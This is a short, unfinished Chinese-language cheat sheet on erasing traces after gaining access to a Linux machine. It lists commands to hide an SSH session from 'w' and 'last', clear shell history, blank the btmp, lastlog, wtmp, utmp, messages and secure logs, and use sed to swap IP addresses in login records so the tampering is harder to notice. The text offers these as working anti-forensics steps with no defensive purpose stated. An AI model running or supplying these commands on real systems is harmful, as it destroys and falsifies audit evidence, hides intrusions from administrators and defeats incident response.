linux痕迹清除
ssh登录不被w last命令监测到
ssh -T root@192.0.0.1 /bin/bash -i
清除history记录
history -r
清除系统日志
echo >/var/log/btmp # 清除登录失败日志
echo >/var/log/lastlog # 清除最后一次登录时间日志
echo >/var/log/wtmp # 清除用户登录日志 对应last
echo >/var/log/utmp # 清除已经登录用户
cat /dev/null >/var/log/message # 清除错误日志
cat /dev/null >/var/log/secure # 清除安全日志
这样太容被发现了,所以考虑使用日志替换
sed -i 's/192.168.0.0/192.168.1.1/g' /var/log/lastlog
sed -i 's/192.168.0.0/192.168.1.1/g' /var/log/wtmp
sed -i 's/192.168.0.0/192.168.1.1/g' /var/log/btmp
sed -i 's/192.168.0.0/192.168.1.1/g' /var/log/utmp # kali2021不存在
未完待续